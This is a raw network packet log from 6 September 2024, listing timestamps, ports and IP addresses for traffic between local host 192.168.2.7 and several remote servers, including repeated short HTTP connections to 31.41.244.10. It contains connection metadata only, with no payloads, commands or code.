Sep 6, 2024 10:01:21.814598083 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.814670086 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.815012932 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.815031052 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.815148115 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.815148115 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.815156937 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.859239101 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.896275043 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.896296978 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.896401882 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.896413088 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.896476030 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.896625996 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.896642923 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.896773100 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.896780968 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.896917105 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.896989107 CEST	443	51444	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.897260904 CEST	443	51442	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.897366047 CEST	51444	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.897420883 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.897439957 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.897453070 CEST	51442	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.897497892 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.897505045 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.897716999 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.897866011 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.897881985 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.899153948 CEST	443	51443	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.899517059 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.899528027 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.901299953 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.901321888 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.901375055 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.901382923 CEST	51444	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.901388884 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.901391029 CEST	443	51444	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.901603937 CEST	443	51444	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.902208090 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.904510021 CEST	51442	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.904516935 CEST	443	51442	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.904730082 CEST	443	51442	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.905395985 CEST	51444	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.905395985 CEST	51444	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.905529976 CEST	443	51444	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.905729055 CEST	51442	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.905729055 CEST	51442	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.905843019 CEST	51443	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.905865908 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.905867100 CEST	443	51442	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.905874968 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.908916950 CEST	51443	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.908921003 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:21.908929110 CEST	443	51443	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.909166098 CEST	443	51443	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.909859896 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.910121918 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.910140991 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.910140991 CEST	51444	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.910260916 CEST	51442	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.910281897 CEST	51444	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.910281897 CEST	51442	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.910346985 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.910346985 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.911700964 CEST	51443	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.911849022 CEST	443	51443	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.911870003 CEST	51443	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:21.911878109 CEST	443	51443	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:21.913796902 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:21.982773066 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.982790947 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983001947 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.983001947 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.983016014 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983078957 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983104944 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983192921 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.983192921 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.983201981 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983231068 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983244896 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983571053 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983589888 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983704090 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.983704090 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.983714104 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983951092 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983964920 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.983989000 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.983997107 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.984185934 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.984205961 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.984414101 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.984414101 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.984425068 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.984462976 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.985197067 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.985213041 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.985337973 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.985346079 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.985368013 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.985487938 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.985515118 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:21.985625982 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.985625982 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:21.985635042 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:22.004229069 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:22.008637905 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:22.013534069 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:22.021354914 CEST	80	51441	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:22.027380943 CEST	51441	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:22.030225039 CEST	51441	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:22.034975052 CEST	80	51441	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:22.060913086 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:22.069477081 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:22.069493055 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:22.069583893 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:22.069593906 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:22.069704056 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:22.069813967 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:22.069828033 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:22.069885969 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:22.069921017 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:22.069921970 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:22.069933891 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:22.069962025 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:22.069962025 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:22.069962978 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:22.070045948 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:22.070719004 CEST	51433	443	192.168.2.7	13.107.246.40
Sep 6, 2024 10:01:22.070739031 CEST	443	51433	13.107.246.40	192.168.2.7
Sep 6, 2024 10:01:22.081104994 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:22.103374004 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:22.120507956 CEST	443	51443	34.120.208.123	192.168.2.7
Sep 6, 2024 10:01:22.120589972 CEST	51443	443	192.168.2.7	34.120.208.123
Sep 6, 2024 10:01:22.181718111 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:22.302268028 CEST	80	51441	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:22.302768946 CEST	51441	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:22.427066088 CEST	51441	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:22.427347898 CEST	51445	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:22.432147980 CEST	80	51445	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:22.432212114 CEST	80	51441	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:22.432301998 CEST	51441	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:22.432595968 CEST	51445	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:22.432595968 CEST	51445	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:22.437530994 CEST	80	51445	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:23.127127886 CEST	80	51445	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:23.128523111 CEST	51445	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.132998943 CEST	51445	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.133367062 CEST	51446	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.138123989 CEST	80	51446	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:23.138143063 CEST	80	51445	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:23.140469074 CEST	51445	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.140490055 CEST	51446	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.140806913 CEST	51446	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.145665884 CEST	80	51446	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:23.859456062 CEST	80	51446	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:23.859590054 CEST	51446	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.974950075 CEST	51446	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.975368023 CEST	51447	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.979970932 CEST	80	51446	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:23.980113029 CEST	51446	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.980122089 CEST	80	51447	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:23.980233908 CEST	51447	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.980350971 CEST	51447	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:23.985102892 CEST	80	51447	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:24.683970928 CEST	80	51447	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:24.684052944 CEST	51447	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:24.686858892 CEST	51447	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:24.687144041 CEST	51448	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:24.691886902 CEST	80	51448	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:24.691998005 CEST	80	51447	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:24.692008972 CEST	51448	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:24.692074060 CEST	51447	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:24.692331076 CEST	51448	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:24.697127104 CEST	80	51448	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:25.412518024 CEST	80	51448	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:25.412607908 CEST	51448	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:25.523274899 CEST	51448	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:25.523646116 CEST	51449	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:25.529107094 CEST	80	51448	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:25.529179096 CEST	80	51449	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:25.529192924 CEST	51448	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:25.529313087 CEST	51449	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:25.532629967 CEST	51449	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:25.537668943 CEST	80	51449	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:26.223895073 CEST	80	51449	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:26.224107027 CEST	51449	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:26.226803064 CEST	51449	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:26.227204084 CEST	51450	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:26.233079910 CEST	80	51450	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:26.233103991 CEST	80	51449	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:26.233237982 CEST	51450	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:26.233237982 CEST	51449	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:26.233498096 CEST	51450	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:26.238333941 CEST	80	51450	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:26.953109980 CEST	80	51450	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:26.953181028 CEST	51450	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.070823908 CEST	51450	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.071111917 CEST	51451	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.075994968 CEST	80	51450	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:27.076077938 CEST	51450	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.076113939 CEST	80	51451	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:27.076199055 CEST	51451	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.076550007 CEST	51451	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.081284046 CEST	80	51451	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:27.769059896 CEST	80	51451	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:27.770768881 CEST	51451	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.773818970 CEST	51451	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.773819923 CEST	51452	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.778642893 CEST	80	51452	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:27.778867006 CEST	80	51451	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:27.779000998 CEST	51452	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.779001951 CEST	51451	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.779156923 CEST	51452	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:27.783941984 CEST	80	51452	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:28.502470970 CEST	80	51452	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:28.502588987 CEST	51452	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:28.614614010 CEST	51452	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:28.614907026 CEST	51454	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:28.619940042 CEST	80	51452	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:28.619955063 CEST	80	51454	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:28.620014906 CEST	51452	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:28.620068073 CEST	51454	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:28.620181084 CEST	51454	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:28.625596046 CEST	80	51454	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:29.338562965 CEST	80	51454	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:29.338670969 CEST	51454	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:29.341972113 CEST	51454	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:29.342267990 CEST	51455	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:29.347183943 CEST	80	51454	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:29.347196102 CEST	80	51455	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:29.347260952 CEST	51454	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:29.347302914 CEST	51455	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:29.347579002 CEST	51455	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:29.352838039 CEST	80	51455	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:30.057322025 CEST	80	51455	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:30.058939934 CEST	51455	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.173655987 CEST	51455	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.173660994 CEST	51456	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.178535938 CEST	80	51456	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:30.178798914 CEST	80	51455	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:30.178824902 CEST	51456	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.178886890 CEST	51455	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.178889036 CEST	51456	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.183813095 CEST	80	51456	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:30.872704029 CEST	80	51456	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:30.872786045 CEST	51456	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.875629902 CEST	51456	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.875925064 CEST	51457	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.880831003 CEST	80	51457	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:30.880916119 CEST	51457	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.881042957 CEST	51457	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.881391048 CEST	80	51456	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:30.884057999 CEST	51456	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:30.885845900 CEST	80	51457	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:31.590508938 CEST	80	51457	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:31.594526052 CEST	51457	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:31.702589035 CEST	51457	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:31.702644110 CEST	51458	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:31.707550049 CEST	80	51458	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:31.707770109 CEST	80	51457	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:31.707914114 CEST	51458	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:31.708085060 CEST	51457	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:31.708498001 CEST	51458	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:31.713345051 CEST	80	51458	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:32.084503889 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:32.089539051 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:32.182742119 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:01:32.187741041 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:32.417135954 CEST	80	51458	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:32.418844938 CEST	51458	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:32.421924114 CEST	51458	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:32.421930075 CEST	51459	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:32.426740885 CEST	80	51459	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:32.426919937 CEST	51459	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:32.427078962 CEST	80	51458	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:32.427114010 CEST	51459	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:32.427228928 CEST	51458	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:32.431895018 CEST	80	51459	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:33.148897886 CEST	80	51459	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:33.148977995 CEST	51459	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:33.261611938 CEST	51459	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:33.261912107 CEST	51460	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:33.266836882 CEST	80	51459	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:33.266860962 CEST	80	51460	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:33.266911983 CEST	51459	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:33.266968012 CEST	51460	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:33.267240047 CEST	51460	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:33.272047997 CEST	80	51460	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:33.272775888 CEST	51460	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:33.275396109 CEST	51461	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:33.280246019 CEST	80	51461	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:33.280304909 CEST	51461	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:33.280560017 CEST	51461	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:33.285340071 CEST	80	51461	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:34.004087925 CEST	80	51461	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:34.004280090 CEST	51461	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.123440027 CEST	51461	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.123702049 CEST	51462	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.128534079 CEST	80	51462	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:34.128664017 CEST	51462	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.128752947 CEST	80	51461	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:34.128762960 CEST	51462	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.128849030 CEST	51461	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.133609056 CEST	80	51462	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:34.824986935 CEST	80	51462	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:34.825661898 CEST	51462	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.828833103 CEST	51462	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.829118967 CEST	51463	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.833997011 CEST	80	51462	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:34.834240913 CEST	80	51463	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:34.834253073 CEST	51462	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.834362984 CEST	51463	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.835216999 CEST	51463	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:34.840023041 CEST	80	51463	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:35.559267044 CEST	80	51463	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:35.559407949 CEST	51463	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:35.668853045 CEST	51463	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:35.668853045 CEST	51464	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:35.673890114 CEST	80	51463	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:35.674009085 CEST	51463	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:35.674050093 CEST	80	51464	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:35.674135923 CEST	51464	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:35.674360037 CEST	51464	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:35.679250002 CEST	80	51464	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:36.372442007 CEST	80	51464	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:36.378314018 CEST	51464	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:36.378314018 CEST	51464	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:36.378802061 CEST	51465	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:36.383579016 CEST	80	51464	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:36.383626938 CEST	80	51465	31.41.244.10	192.168.2.7
